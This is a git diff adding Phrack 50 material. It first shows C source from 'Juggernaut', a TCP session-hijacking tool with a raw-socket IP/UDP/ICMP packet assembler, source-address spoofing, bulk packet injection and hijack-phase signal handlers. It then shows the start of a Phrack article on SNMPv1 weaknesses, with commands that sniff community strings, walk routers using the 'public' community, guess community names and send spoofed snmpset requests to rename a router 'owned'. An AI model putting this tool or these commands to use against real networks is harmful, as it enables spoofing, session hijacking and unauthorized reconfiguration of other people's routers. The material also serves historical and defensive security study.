+	        if(buf[0]=='f'){	/* Input from file */
+		    fprintf(stderr,"\nFilename [q] >");
+		    if(buf[0]==0x0a||buf[0]=='q')break;
+		    fgets(filename,sizeof(filename),stdin);
+		    for(i=0;i<4*MINIBUF;i++)if(!filename[i])break;
+		    filename[--i]=0;
+		    if((fd=open(filename,O_RDONLY))<0){
+                        if(verbosity){
+                            fprintf(stderr,"Cannot open file for reading.\n");
+                            fprintf(stderr,"[cr]");
+                            getchar();
+                        }
+			continue;
+                    }
+                    i=0;
+                    j=0;
+		    while(i<512){
+                        j=read(fd,upack.payload,sizeof(upack.payload));
+                        if(!j)break;  
+                        i+=j;
+                    }
+		    strncpy(data,filename,sizeof(filename));
+		    close(fd);
+		    packetready|=0x04;
+		    break;
+       	 	}
+		if(packetready&0x04)packetready^=0x04;
+		bzero(data,sizeof(data));
+		bzero(upack.payload,sizeof(upack.payload));
+		break;
+	    case 4:     /* Return to previous menu */
+	        loopsentry=0;
+                bzero(&upack,sizeof(upack));
+		break;
+            case 5:     /* Retuen to Main */
+                loopsentry=0;
+                woe=1;
+                break;
+	    case 6:     /* RIP assembler */
+	        if(packetready==0x07){		
+                    upack.udp.len=htons(UDPHDR+BUFSIZE);
+		    ripa(UDPTRANSPORT);		
+		    break;
+		}
+	        continue;
+	    default:    /* bad input */
+	        continue;   
+        }
+    }
+}
+
+/* 
+ *  ICMP assembler
+ *  This is no where as robust as it should be.  In fact, it doesn't really 
+ *  create legal ICMP packets.  Oh well.  Next version.  I am tired of
+ *  packet assembly duldrums...
+ */
+
+void icmpa(){
+
+    void ripa(int);
+    void mwipe();
+    void mpktaicmp(int,unsigned short,unsigned short,char *);
+
+    char buf[2*MINIBUF];
+    unsigned long val;
+    int packetready=0;		/* flag bits */
+    char data[4*MINIBUF]={0},filename[4*MINIBUF]={0};
+    int i=0,j,fd=0,loopsentry=1;
+
+    bzero(&ipack,sizeof(ipack));
+
+    while(loopsentry){
+        mwipe();	
+
+        mpktaicmp(packetready,ipack.icmp.type,ipack.icmp.code,data);
+                
+	fgets(buf,sizeof(buf),stdin);
+        if(!(val=atoi(buf)))continue;
+        switch(val){
+            case 1:				/* Type */
+	        fprintf(stderr,"\nType (0,3,4,5,8,9,10,11,12,13,14,15,16,17,18) [q] >");
+                fgets(buf,sizeof(buf),stdin);
+		if(buf[0]==0x0a||buf[0]=='q'){
+		    if(packetready&0x01)packetready^=0x01;
+		    ipack.icmp.type=0;
+		    break;
+		}
+	        if(!(int)(val=atoi(buf)))break;
+		ipack.icmp.type=val;
+		packetready|=0x01;
+		break;
+            case 2:				/* Code */
+	        fprintf(stderr,"\nCode (0,1 {2,3}) [q] >");
+                fgets(buf,sizeof(buf),stdin);
+		if(buf[0]==0x0a||buf[0]=='q'){
+		if(packetready&0x02)packetready^=0x02;
+		    ipack.icmp.code=0;
+		    break;
+		}
+		if(!(int)(val=atoi(buf)))break;
+		ipack.icmp.code=val;
+		packetready|=0x02;
+		break;
+	    case 3:				/* Data payload */
+	        bzero(data,sizeof(data));
+		bzero(ipack.payload,sizeof(ipack.payload));
+		bzero(filename,sizeof(filename));
+		fprintf(stderr,"\nData Payload Source (512 Bytes Maximum) [qfc] >");
+                fgets(buf,sizeof(buf),stdin);
+		if(buf[0]=='c'){	/* Input from command line */
+		    fprintf(stderr,"\nEnter Payload [q] >");
+		    fgets(ipack.payload,sizeof(ipack.payload),stdin);
+		    strncpy(data,ipack.payload,sizeof(data));
+		    packetready|=0x04;
+		    break;
+		}
+		if(buf[0]=='f'){	/* Input from file */
+		    fprintf(stderr,"\nFilename [q] >");
+		    if(buf[0]==0x0a||buf[0]=='q')break;
+		    fgets(filename,sizeof(filename),stdin);
+		    for(i=0;i<4*MINIBUF;i++)if(!filename[i])break;
+		    filename[--i]=0;	
+		    if((fd=open(filename,O_RDONLY))<0){
+                        if(verbosity){
+                            fprintf(stderr,"Cannot open file for reading.\n");
+                            fprintf(stderr,"[cr]");
+                            getchar();
+                        }
+		        continue;
+                    }
+                    i=0;
+                    j=0;
+                    while(i<512){
+                        j=read(fd,upack.payload,sizeof(upack.payload));
+                        if(!j)break; 
+                        i+=j;
+                    }
+                    strncpy(data,filename,sizeof(filename));
+		    close(fd);
+		    packetready|=0x04;
+		    break;
+       	 	}
+		if(packetready&0x04)packetready^=0x04;	
+		bzero(data,sizeof(data));
+		bzero(ipack.payload,sizeof(ipack.payload));
+		break;
+	    case 4:	
+                loopsentry=0;
+	        bzero(&ipack,sizeof(ipack));
+		break;
+            case 5:
+                loopsentry=0;
+                woe=1;
+                break;
+	    case 6: 
+	        if(packetready==0x07){	
+		    ripa(ICMPTRANSPORT);		
+		    break;
+		}
+		continue;
+	    default: 
+	        continue;
+        }
+    }
+}
+
+
+/* 
+ *  IP assembler and xmitter.  Transport layer checksum routines thanks to 
+ *  Myth (Red, actually).
+ */
+
+void ripa(transport)
+int transport;
+{
+
+    void mwipe();
+    void mpktaip(int,char *,char *,unsigned short,unsigned short,char *,char *,int,char *);
+    char *hostLookup(unsigned long);
+    unsigned long nameResolve(char *);
+    unsigned short in_cksum(unsigned short *,int);
+    
+
+    char buf[2*MINIBUF];
+    unsigned long val;
+    char tosflags[MINIBUF]={0},fflags[MINIBUF]={0},packettype[MINIBUF]={0};
+    char sip[2*MINIBUF]={0},dip[2*MINIBUF]={0},*tempBuf;
+    int packetready=0;              /* flag bits */
+    int i=0,j=0,k=0;                /* Counters */
+    int loopsentry=1,number=0;
+
+    struct sockaddr_in sin;	 
+
+    struct psuedoHeader{                        
+        unsigned long saddr;
+        unsigned long daddr;
+        unsigned char null;
+        unsigned char prot;
+        unsigned short tlen;
+    }*ppheader;
+
+    extern int ripsock;
+
+    bzero(&rippack,sizeof(rippack));
+    bzero((char *)&sin,sizeof(sin));
+	
+    srandom((unsigned)time(0));   
+
+    while(loopsentry){
+        i=0;
+        mwipe();
+        mpktaip(packetready,tosflags,fflags,ntohs(rippack.ip.frag_off),rippack.ip.ttl,sip,dip,number,packettype);
+        
+        fgets(buf,sizeof(buf),stdin);
+        if(!(val=atoi(buf)))continue;
+        switch(val){
+            case 1:     /* TOS */
+	        bzero(tosflags,sizeof(tosflags));
+		fprintf(stderr,"\nMinimize Delay? [yNq] >");
+                fgets(buf,sizeof(buf),stdin);
+		if(buf[0]=='q'){
+		    if(packetready&0x01)packetready^=0x01; 
+		    rippack.ip.tos=0;
+		    break;
+		}
+		if(buf[0]=='y'){
+		    rippack.ip.tos|=0x10;
+		    tosflags[i++]='D';
+		}
+		fprintf(stderr,"\nMaximize Throughput? [yNq] >");
+                fgets(buf,sizeof(buf),stdin);
+		if(buf[0]=='q'){
+		    if(packetready&0x01)packetready^=0x01; 
+		    rippack.ip.tos=0;
+		    break;
+		}
+		if(buf[0]=='y'){
+		    rippack.ip.tos|=0x08;
+		    tosflags[i++]='T';
+		}
+		fprintf(stderr,"\nMaximize Reliability? [yNq] >");
+                fgets(buf,sizeof(buf),stdin);
+		if(buf[0]=='q'){
+		    if(packetready&0x01)packetready^=0x01; 
+		    rippack.ip.tos=0;
+		    break;
+		}
+		if(buf[0]=='y'){
+		    rippack.ip.tos|=0x04;
+		    tosflags[i++]='R';
+		}
+		fprintf(stderr,"\nMinimize Monetary Cost? [yNq] >");
+                fgets(buf,sizeof(buf),stdin);
+		if(buf[0]=='q'){
+		    if(packetready&0x01)packetready^=0x01; 
+		    rippack.ip.tos=0;
+		    break;
+		}
+		if(buf[0]=='y'){
+		    rippack.ip.tos|=0x02;
+		    tosflags[i++]='C';
+		}
+		if(!tosflags[0])strcpy(tosflags,"none set");
+		packetready|=0x01;
+		break;
+            case 2:			/* Frag Flags */
+	        bzero(fflags,sizeof(fflags));
+		fprintf(stderr,"\nMore Fragments? [yNq] >");
+                fgets(buf,sizeof(buf),stdin);
+		if(buf[0]=='q'){
+		    if(packetready&0x02)packetready^=0x02; 
+		    rippack.ip.frag_off=0;
+		    break;
+		}
+		if(buf[0]=='y'){
+		    rippack.ip.frag_off|=htons(0x4000);
+		    fflags[i++]='M';
+		}
+		fprintf(stderr,"\nDon't Fragment? [yNq] >");
+                fgets(buf,sizeof(buf),stdin);
+		if(buf[0]=='q'){
+		    if(packetready&0x02)packetready^=0x02; 
+		    rippack.ip.frag_off=0;
+		    break;
+		}
+	        if(buf[0]=='y'){
+		    rippack.ip.frag_off|=htons(0x2000);
+		    fflags[i++]='D';
+		}
+                if(!fflags[0])strcpy(fflags,"none set");
+		packetready|=0x02;
+		break;
+            case 3: 		/* Frag Offset */
+	        fprintf(stderr,"\nFragment Offset [qr] >");
+                fgets(buf,sizeof(buf),stdin);
+	        if(buf[0]=='r'){
+		    rippack.ip.frag_off|=htons(random()&0x1fff);
+		    packetready|=0x04;
+		    break;
+	        }
+                if(buf[0]=='q'||(val=atoi(buf))<0||val>8191){
+		    if(packetready&0x04)packetready^=0x04;
+		    rippack.ip.frag_off&=~0x3fff;
+		    break;
+	        }
+                rippack.ip.frag_off|=htons(val&0x1fff);
+	        packetready|=0x04;
+                break;
+            case 4:			/* TTL */
+                fprintf(stderr,"\nTTL (0 - 255) [qr] >");
+                fgets(buf,sizeof(buf),stdin);
+	        if(buf[0]=='r'){			
+		    rippack.ip.ttl=random()&0xff;
+		    packetready|=0x08;
+	            break;
+	        }
+	        if(buf[0]=='q'||(val=atoi(buf))<0||val>255){
+		    if(packetready&0x08)packetready^=0x08;
+		    rippack.ip.ttl=0;
+		    break;
+                }
+	        rippack.ip.ttl=val;
+	        packetready|=0x08;
+	        break;
+	    case 5:			/* Source Address */
+                bzero(sip,sizeof(sip));
+	        fprintf(stderr,"\nSource Address [qr] >");
+                fgets(buf,sizeof(buf),stdin);
+		if(buf[0]==0x0a||buf[0]=='q'){
+		    if(packetready&0x10)packetready^=0x10;
+		    rippack.ip.saddr=0;
+		    break;
+                }
+                if(buf[0]=='r'){
+                    rippack.ip.saddr=htonl(random());
+                    strncpy(sip,hostLookup(rippack.ip.saddr),sizeof(sip));
+                    packetready|=0x10;
+                    break;
+                }
+                strncpy(sip,buf,sizeof(sip));
+                for(i=0;i<2*MINIBUF;i++)if(!sip[i])break;
+                sip[--i]=0;                 	
+       	        if(!(rippack.ip.saddr=nameResolve(buf))){
+		    fprintf(stderr,"Cannot resolve IP address.\n");
+	            fprintf(stderr,"[cr]");
+                    getchar();
+		    bzero(sip,sizeof(sip));			
+		    if(packetready&0x10)packetready^=0x10;
+		    break;
+	        }
+                packetready|=0x10;
+	        break;
+	    case 6:			/* Destination Address */
+                bzero(dip,sizeof(dip));
+	        fprintf(stderr,"\nDestination Address [qr] >");
+                fgets(buf,sizeof(buf),stdin);
+	        if(buf[0]==0x0a||buf[0]=='q'){
+	            if(packetready&0x20)packetready^=0x20;
+	            rippack.ip.daddr=0;
+	            break;
+                }
+                if(buf[0]=='r'){
+                    strncpy(dip,hostLookup(rippack.ip.daddr),sizeof(dip));
+                    rippack.ip.daddr=htonl(random());
+                    packetready|=0x20;
+                    break;
+                }
+                strncpy(dip,buf,sizeof(dip));
+                for(i=0;i<2*MINIBUF;i++)if(!dip[i])break;
+                dip[--i]=0;
+	        if(!(rippack.ip.daddr=nameResolve(buf))){
+	            fprintf(stderr,"Cannot resolve IP address.\n");
+	            fprintf(stderr,"[cr]");
+                    getchar();
+	            bzero(dip,sizeof(dip));
+	            if(packetready&0x20)packetready^=0x20;
+	            break;
+	        }
+	        packetready|=0x20;
+	        break;
+	    case 7:                     /* Number of packets to send */
+                fprintf(stderr,"\nAmount (1 - 65536) [qr] >");
+                fgets(buf,sizeof(buf),stdin);
+                if(buf[0]=='r'){
+                    number=(random()&0xffff);
+                    packetready|=0x40;
+                    break;
+                }
+                if(buf[0]=='q'||(val=atoi(buf))<0||val>65536){
+                    if(packetready&0x40)packetready^=0x40;
+                    number=0;
+                    break;
+                }
+                number=val;
+                packetready|=0x40;
+                break;
+            case 8:			    /* Return */
+                loopsentry=0;
+                bzero(&rippack,sizeof(rippack));
+	        break;
+            case 9:
+                loopsentry=0;
+                woe=1;
+                break;
+            case 10:			
+                if(packetready==0x7f){
+		    sin.sin_family=AF_INET;         
+                    sin.sin_port=0;
+
+                    rippack.ip.version=4;	        /* IPv4 */
+                    rippack.ip.ihl=5;		        /* This will change 
+                                                           if options are
+                                                           present */
+		    switch(transport){              
+		        case NOTRANSPORT:		/* IP packet only */
+                            sin.sin_addr.s_addr=rippack.ip.daddr;
+
+                            rippack.ip.protocol=IPPROTO_IP;
+
+		            break;
+		        case TCPTRANSPORT:		/* TCP */
+                            sin.sin_port=tpack.tcp.source;
+                            sin.sin_addr.s_addr=rippack.ip.daddr;
+                        
+                            rippack.ip.protocol=IPPROTO_TCP;
+
+                            tempBuf=(char *)malloc(PHDR+TCPHDR+BUFSIZE);
+                            ppheader=(struct psuedoHeader *)tempBuf;
+
+                            ppheader->saddr=rippack.ip.saddr;
+                            ppheader->daddr=rippack.ip.daddr;
+                            ppheader->prot=IPPROTO_TCP;
+                            ppheader->null=0;
+                            ppheader->tlen=htons(TCPHDR+BUFSIZE);
+
+                            bcopy(&tpack,tempBuf+PHDR,PHDR+TCPHDR+BUFSIZE);
+                            tpack.tcp.check=in_cksum((unsigned short *)tempBuf,PHDR+TCPHDR+BUFSIZE);
+                            free(tempBuf);
+                            bcopy((char *)&tpack,(char *)&rippack.payload,TCPHDR+BUFSIZE);
+
+                            break;
+		        case UDPTRANSPORT:		/* UDP */
+                            sin.sin_port=upack.udp.source;
+                            sin.sin_addr.s_addr=rippack.ip.daddr;
+
+			    rippack.ip.protocol=IPPROTO_UDP;
+
+                            tempBuf=(char *)malloc(PHDR+UDPHDR+BUFSIZE);
+                            ppheader=(struct psuedoHeader *)tempBuf;
+
+                            ppheader->saddr=rippack.ip.saddr;
+                            ppheader->daddr=rippack.ip.daddr;
+                            ppheader->prot=IPPROTO_UDP;
+                            ppheader->null=0;
+                            ppheader->tlen=htons(UDPHDR+BUFSIZE);
+
+                            bcopy(&upack,tempBuf+PHDR,PHDR+UDPHDR+BUFSIZE);
+                            upack.udp.check=in_cksum((unsigned short *)tempBuf,PHDR+UDPHDR+BUFSIZE);
+                            free(tempBuf);
+                            bcopy((char *)&upack,(char *)&rippack.payload,UDPHDR+BUFSIZE);
+
+                            break;
+		        case ICMPTRANSPORT:		/* ICMP */
+                            sin.sin_addr.s_addr=rippack.ip.daddr;
+
+			    rippack.ip.protocol=IPPROTO_ICMP;
+			
+                            break;
+		        default:	    /* Control should never fall here */
+			    if(verbosity)perror("RIP Assembler [unknown transport]");
+			    exit(1);
+		    }
+                    for(k=number,i=0;i<number;i++){
+    	                if((j=sendto(ripsock,&rippack,RIPPACKETSIZE,0,(struct sockaddr *)&sin,sizeof(sin)))<RIPPACKETSIZE){
+		            fprintf(stderr,"Packet # %d: Wrote only %d bytes to raw socket\n",i,j);
+                            k--;
+			    if(verbosity)perror("RIP module sendto");
+		        }
+                    }
+		    fprintf(stderr,"%d Packet(s) injected.\n",k);
+		    getchar();
+		    break;
+	        }
+	        continue;
+	    default: 
+                continue;
+        }
+    }
+	                            /* NOTREACHED */
+}
+<-->
+<++> Juggernaut/NumberOneCrush/surplus.c
+/*
+ *
+ *                                  Juggernaut
+ *                                  Version b2
+ *
+ *                            1996/7 Guild productions
+ *                           daemon9[guild|phrack|r00t]
+ *
+ *                         comments to route@infonexus.com
+ *
+ *  This coding project made possible by a grant from the Guild corporation
+ * 
+ *  surplus.c - helper functions
+ * 
+ */
+
+#include <string.h>
+#include <signal.h>
+#include <stdio.h>
+#include <fcntl.h>
+#include <unistd.h>
+#include <netdb.h>
+#include <arpa/inet.h>
+#include <sys/stat.h>
+#include <sys/ioctl.h>
+#include <sys/types.h>
+#include <sys/wait.h>
+
+#define HELPFILE    "./ClothLikeGauze/.help"
+#define FBUFSIZE     80
+#define MINIBUF      10
+
+extern int verbosity;    
+
+
+/*
+ *  IP address into network byte order
+ */
+                 
+unsigned long nameResolve(hostname)
+char *hostname;
+{
+        
+    struct in_addr addr;
+    struct hostent *hostEnt; 
+   
+    if((addr.s_addr=inet_addr(hostname))==-1){
+        if(!(hostEnt=gethostbyname(hostname)))return(0);
+        bcopy(hostEnt->h_addr,(char *)&addr.s_addr,hostEnt->h_length);
+    }
+    return addr.s_addr;
+}
+
+#ifdef FASTCHECK
+ 
+/*
+ *  Fast IP checksum routine.
+ */
+
+unsigned short in_cksum(buff,len)
+unsigned char *buff;
+int len;
+{
+    unsigned long sum = 0;
+    if (len>3){
+        __asm__("clc\n"
+        "1:\t"
+        "lodsl\n\t"
+        "adcl %%eax, %%ebx\n\t"
+        "loop 1b\n\t"
+        "adcl $0, %%ebx\n\t"
+        "movl %%ebx, %%eax\n\t"
+        "shrl $16, %%eax\n\t"
+        "addw %%ax, %%bx\n\t"
+        "adcw $0, %%bx"
+        : "=b" (sum) , "=S" (buff)
+        : "0" (sum), "c" (len >> 2) ,"1" (buff)
+        : "ax", "cx", "si", "bx" );
+    }
+    if(len&2){
+        __asm__("lodsw\n\t"
+        "addw %%ax, %%bx\n\t"      
+        "adcw $0, %%bx"
+        : "=b" (sum), "=S" (buff)
+        : "0" (sum), "1" (buff)
+        : "bx", "ax", "si");
+    }
+    if(len&1){
+        __asm__("lodsb\n\t"
+        "movb $0, %%ah\n\t"
+        "addw %%ax, %%bx\n\t"
+        "adcw $0, %%bx"
+        : "=b" (sum), "=S" (buff)
+        : "0" (sum), "1" (buff)
+        : "bx", "ax", "si");
+    }                     
+    sum =~sum;
+    return(sum&0xffff);
+}
+
+#else
+ 
+/*
+ *  IP Family checksum routine
+ */
+
+unsigned short in_cksum(ptr,nbytes)
+unsigned short *ptr;
+int nbytes;
+{
+                        
+    register long sum=0;        /* assumes long == 32 bits */
+    u_short oddbyte;
+    register u_short answer;    /* assumes u_short == 16 bits */
+        
+    while(nbytes>1){
+        sum+=*ptr++;
+        nbytes-=2;    
+    }
+    if(nbytes==1){              /* mop up an odd byte, if necessary */
+        oddbyte=0;              /* make sure top half is zero */
+        *((u_char *)&oddbyte)=*(u_char *)ptr;   /* one byte only */
+        sum+=oddbyte;
+    }               
+    sum+=(sum>>16);             /* add carry */
+    answer=~sum;                /* ones-complement, then truncate to 16 bits */
+    return(answer);
+}
+
+#endif 
+
+/*
+ *  Network byte order into IP address
+ */
+
+char *hostLookup(in)
+unsigned long in;
+{
+
+    #define BUFSIZE         256
+ 
+    char hostname[BUFSIZE]={0};
+    struct in_addr addr;
+#ifdef USENAME
+    struct hostent *hostEnt;
+#endif
+   
+    addr.s_addr=in;
+    
+#ifdef USENAME
+    hostEnt=gethostbyaddr((char *)&addr,sizeof(struct in_addr),AF_INET);
+    if(!hostEnt)
+#endif
+
+        strcpy(hostname,inet_ntoa(addr));           /* KLUDGEY. */
+
+#ifdef USENAME
+    else strcpy(hostname,hostEnt->h_name);
+#endif
+    return(strdup(hostname));
+}
+ 
+/*
+ *  Simple daemonizing procedure.
+ */   
+
+int shadow(void){
+
+    int fd,pid;
+    extern int errno;
+
+    signal(SIGTTOU,SIG_IGN);    /* Ignore these signals */
+    signal(SIGTTIN,SIG_IGN);
+    signal(SIGTSTP,SIG_IGN);
+
+    switch((pid=fork())){
+        case 0:                 /* Child */
+            break;
+        default:        
+            exit(0);            /* Parent */
+        case -1:
+            fprintf(stderr,"Forking Error\n");
+            exit(1);
+    }
+    setpgrp();
+    if((fd=open("/dev/tty",O_RDWR))>=0){
+        ioctl(fd,TIOCNOTTY,(char *)NULL);
+        close(fd);
+    }
+    errno=0;
+    chdir("/");
+    umask(0);
+    return(pid);
+}
+
+
+/*
+ *  Keeps processes from zombiing on us...
+ */
+        
+static void reaper(signo)
+int signo;
+{
+    pid_t pid;
+    int sys;
+
+    pid=wait(&sys); 
+    signal(SIGCHLD,reaper);
+    return;
+}
+
+
+/*
+ *  Dump usage and exit.
+ */
+
+void usage(nomenclature)
+char *nomenclature;
+{
+    fprintf(stderr,"\n\nUsage:\t%s [-h] [-s TOKEN [-e xx] ] [-v] [-t xx]\n\n
+    -h terse help
+    -H expanded help for those 'specially challanged' people...
+    -s dedicated sniffing (bloodhound) mode, in which TOKEN is found enticing
+    -e enticement factor (defaults to 16)
+    -v decrease verbosity (don't do this)
+    -V version information
+    -t xx network read timeout in seconds (defaults to 10)
+    Invoked without arguments, Juggernaut starts in `normal` mode.\n\n",nomenclature);
+    exit(0);
+}
+
+
+/*
+ *  Simple file pager.
+ */
+
+void bookworm(){
+
+    FILE *fp;
+    char tempBuf[FBUFSIZE],buf[MINIBUF];
+    int i=0;
+
+    if(!(fp=fopen(HELPFILE,"r"))){
+        if(verbosity){
+            fprintf(stderr,"Cannot open help file.\n");
+            fprintf(stderr,"[cr]");
+            getchar();
+            return;
+        }
+    }
+    while(fgets(tempBuf,FBUFSIZE-1,fp)){
+        fprintf(stderr,tempBuf);
+        if(i==24){
+            fprintf(stderr,"\n[cr,q] >");
+            bzero(&buf,sizeof(buf));
+            fgets(buf,sizeof(buf-1),stdin);
+            if(buf[0]=='q')break;
+            i=0;
+        }
+        else i++;
+    }
+}
+
+
+/*
+ *  Main signal handler to facilitate clean exits.
+ */
+
+void twitch(){
+
+    void cleanexit();
+
+    if(verbosity)fprintf(stderr,"\nCaught signal, exiting cleanly.\n");
+    signal(SIGINT,SIG_DFL);
+    signal(SIGQUIT,SIG_DFL);
+    cleanexit();
+}
+
+
+/*
+ *  Used as a catchall to cleanly exit proccesses
+ */
+
+void spasm(){
+
+    extern int linksock;
+
+    if(linksock)close(linksock);        /* Hunter should have this... */
+    exit(0);
+}
+
+
+/*
+ *  Spy signal handler.
+ */ 
+                    
+void convulsion(){
+
+    void twitch();
+    
+    extern int sigsentry;
+
+    if(verbosity)fprintf(stderr,"\nCaught signal.\n");
+    fprintf(stderr,"[cr]");
+    getchar();
+    signal(SIGINT,twitch);
+    sigsentry=0;
+}
+
+
+/*
+ *  Pre-hijacking signal handler.
+ */
+
+void sputter(){
+
+    void twitch();
+
+    extern int sigsentry;
+
+    if(verbosity)fprintf(stderr,"\nCaught prehijack signal.\n");
+    signal(SIGINT,twitch);
+    sigsentry=0;
+}      
+
+
+/*
+ *  Post-hijacking signal handler.
+ */
+
+void seizure(){
+
+    void twitch();
+
+    extern int sigsentry;
+
+    if(verbosity)fprintf(stderr,"\nCaught posthijack signal.\n");
+    sigsentry=0;
+    signal(SIGINT,twitch);
+}      
+
+/*
+ *  Exit Cleanly.
+ */
+
+void cleanexit(){
+
+    void powerdown();
+
+    extern int ripsock;
+    extern int hpid;
+    extern int acrstpid;
+
+    close(ripsock);
+    powerdown();
+    if(kill(hpid,SIGUSR1))if(verbosity){    /* Send signal to the hunter */
+        perror("(cleanexit) Could not signal hunter");
+        fprintf(stderr,"[cr]");
+        getchar();
+    }
+    if(acrstpid)    /* Send signal to the automated connection reset daemon. 
+                       XXX - This only signals one daemon!  If more exist, 
+                       they will be left stranded! */
+        if(kill(acrstpid,SIGUSR1))if(verbosity){ 
+        perror("(cleanexit) Could not signal ACRSTD"); 
+        fprintf(stderr,"[cr]");    
+        getchar();                     
+        }                                  
+    fprintf(stderr,"Juggernaut is a Guild Corporation production, (c) 1996/7.\n\n");
+    exit(0);
+}
+  
+<-->
+
+EOF
diff --git a/phrack50/7.txt b/phrack50/7.txt
new file mode 100644
index 0000000..8c4b882
--- /dev/null
+++ b/phrack50/7.txt
@@ -0,0 +1,447 @@
+                                .oO Phrack 50 Oo.
+ 
+                            Volume Seven, Issue Fifty
+ 
+                                     7 of 16
+ 
+                Network Management Protocol Insecurity: SNMPv1
+                                 alhambra [guild]
+                              alhambra@infonexus.com
+ 
+ 
+As networks have become larger and more complex, a need has been felt by 
+certain portions of the network administration crowd to implement network
+management protocols.  From an administrative point of view, this makes
+a lot of sense; centralize the administration of the network, and make it
+convenient and easy for the administrator to monitor and administer changes
+as needed.  As usual, however, from the security point of view, these 
+protocols are a potential for catastrophe.
+ 
+In this article, we'll explore the world of SNMPv1.  In two later articles
+(to be published in later issues of Phrack) we'll look into other network 
+management schemes (SNMPv2, DCE, etc).  SNMPv1 has been around for a while.  
+In fact, a number of the problems outlined in this paper have been fixed
+with the release of SNMPv2.  As usual, however, large networks who placed
+their original administration burdens on SNMPv1 have been slow to change.
+As a result, large corporations, universities, and some small/cheap ISP's 
+still run their routers/hubs/bridges/hosts/etc with version 1 enabled, often
+in horribly set up configurations.  
+
+The SNMP protocol
+ 
+The SNMP protocol has 5 simple types of messages.  They are get-request,
+get-next-request, set-request, get response and trap.  We will concentrate
+on using the get-* messages to retrieve information from remote sites, routers
+and the like, and the set-request to manipulate a variety of settings on our
+target.
+ 
+SNMP uses UDP as it transport mechanism.  The basic layout of an SNMP packet
+is:
++-----------------------------------------------------------------------------+
+|IP |UDP|Version|Community|PDU |Request|err.|err. |name|value|name|value| ... |
+|Hdr|Hdr|       |         |Type|  ID   |stat|index|    |     |    |     |     |
++-----------------------------------------------------------------------------+
+
+Community is SNMP's authentication mechanism.  PDU type is the type of message
+being sent (get-request, set request, etc.)  Request ID is used to 
+differentiate between requests. Error status is (obviously) used to transport 
+error messages, and error index gives the offset of the variable which was in
+error.  Finally, name and value represent the name of the field requested and 
+either the value to set it to or the value of it on the remote server.  These 
+are defined by a MIB written in ASN.1, and encoded using a code called BER. 
+ASN.1 is used to define data and the types and properties of this data.  
+BER is used to actually transmit the data in a platform independent manner 
+(similar perhaps to XDR.)  
+ 
+The values that can be fetched and set via SNMP are defined in what is called
+the Message Information Base or MIB.  The MIB is written in ASN.1, and defines
+all the different variable classes, types, variables and whatnot associated
+with SNMP.  Standard things in the MIB are classes used to define variables
+associated with data for statistics and values for the system as a whole, the
+interfaces on the system, (possibly) an address translation table, IP, TCP,
+UDP, ICMP, and so on, depending on just what kind of system the agent is
+running on. 
+
+Where exactly do SNMPv1's security flaws lie?  We can narrow them down to
+4 general problem areas:
+1) Use of UDP as a transport mechanism
+2) Use of clear text community names and the presence 
+	of default, overpriveleged communities
+3) Information avaialable
+4) Ability to remotely modify parameters.
+
+They're all related to one another.  We'll go through one by one, define
+the problem, and explain how it is exploitable.  Unfortunately, most of 
+SNMPv1 (from here on out, we'll just call it SNMP) problems stem from its 
+design, and have no easy solution barring the move to SNMPv2 or some other 
+network management protocol.  Some common sense, however, can minimize the 
+problems in most situations.
+
+
+
+UDP as a transport mechanism
+
+  I know I'm not alone in feeling that UDP is, at best, a poor idea when
+used in any sort of application that requires any level of security.  The
+fact that UDP is connectionless leads to a myriad of problems with
+regard to host based authentication, which unfortunately enough, SNMP uses
+as one of its mechanisms.  So we have 2 basic attacks due to the fact that
+a UDP transport is used.  First, we can easily spoof packets to a server, and
+modify/add/reconfigure the state of the server.  As we're using a spoofed
+source address, there isn't any way to get the return message, but the 
+machine we are spoofing will simply drop the response message, and the server
+is none the wiser.  Using our 'snmpset' program which has been modified to
+use a raw socket to allow us to forge the source address, we can modify any
+value in the MIB defined as read-write ASSUMING WE HAVE A PRIVELEGED COMMUNITY
+NAME.  
+
+snmpset -v 1 -e 10.0.10.12 router.pitiful.com cisco00\
+        system.sysName.0 s "owned"
+
+Changes our the router name to 'owned', just in case we want to be really
+obvious that this router has crappy security.
+
+But how do we go about getting a legitimate community name?  We have a few
+different methods we can employ.
+
+
+Use of cleartext community names, and default communities
+
+   One of the most laughable things about the SNMP protocol is its 
+"authentication" method.  I use the term authentication in the loosest
+sense only, as it makes me cringe when I think about it.  SNMP only
+can authenticate based on two different elements.  The source address, as
+we saw above, it trivial to forge, rendering address based authentication
+useless.  The second method is the use of "community" names.  Community names
+can be thought of as passwords to the SNMP agent.  As easily as plaintext
+password can be sniffed from telnet, rlogin, ftp and the like, we can sniff
+them from SNMP packets.  As a matter of fact, it's easier, as every SNMP
+packet will have the community name.  Grab your favorite sniffer (sniffer, not
+password sniffer) and head over to your favorite segement running SNMP.  My
+sniffer of choice is 'snoop' so I'll use it as my example, though using any
+other sniffer should be easy.  SNMP uses port 161.  The field we're after, the
+community, is typically 6-8 characters long.  Cranking up snoop on my segment
+reveals the following. (IP's changed to protect the stupid, of course)
+
+# snoop -x 49,15 port 161
+Using device /dev/le (promiscuous mode)
+10.20.48.94 -> 10.20.19.48 UDP D=161 S=1516 LEN=62
+ 
+           0: 0572 3232 3135 a028 0202 009c 0201 0002    .r4485.(.......
+
+There we go.  Using this community name we're able to grab all the info
+we want, and modify all the parameter and whatnot we desire.  Easy enough...
+if you're able to sniff the segment.  But what happens when you can't?
+
+
+Available Information
+
+When you can't sniff the segment, life gets a little more complicated.  But
+only a little.  We have a few things on our side that may come in handy.  
+First off, almost always there is a default 'public' community.  Very few 
+admin's take the time to deactivate this community, nor realize the risk it
+poses.  Using this community, we can usually read all the information we want.
+Quite often, being able to read the information gives us enough clues to
+try to brute force a legitimate community name.
+
+snmpwalk -v 1 router.pitiful.com public system
+will dump the contents of the system table to us, returning something like:
+
+system.sysDescr.0 = "Cisco Internetwork Operating System Software ..IOS (tm) GS
+Software (RSP-K-M), Version 11.0(4), RELEASE SOFTWARE (fc1)..Copyright (c) 1986
+-1995 by cisco Systems, Inc...Compiled Mon 18-Dec-95 22:54 by alanyu"
+system.sysObjectID.0 = OID: enterprises.Cisco.1.45
+system.sysUpTime.0 = Timeticks: (203889196) 23 days, 14:21:31
+system.sysContact.0 = "Jeff Wright"
+system.sysName.0 = "hws"
+system.sysLocation.0 = ""
+system.sysServices.0 = 6
+
+We see that we're dealing with a cisco router, and we see it's contact's name,
+and the system name.  Same as we might do with guessing passwords, we can use
+this information to try to piece together a community name.  Popular favorites
+include stuff like 'admin' 'router' 'gateway' and the like, combined with
+numbers or whatnot.  Trying something like 'routerhws' for the above example
+might work.  It might not.  While failed attempts are noted, very few people,
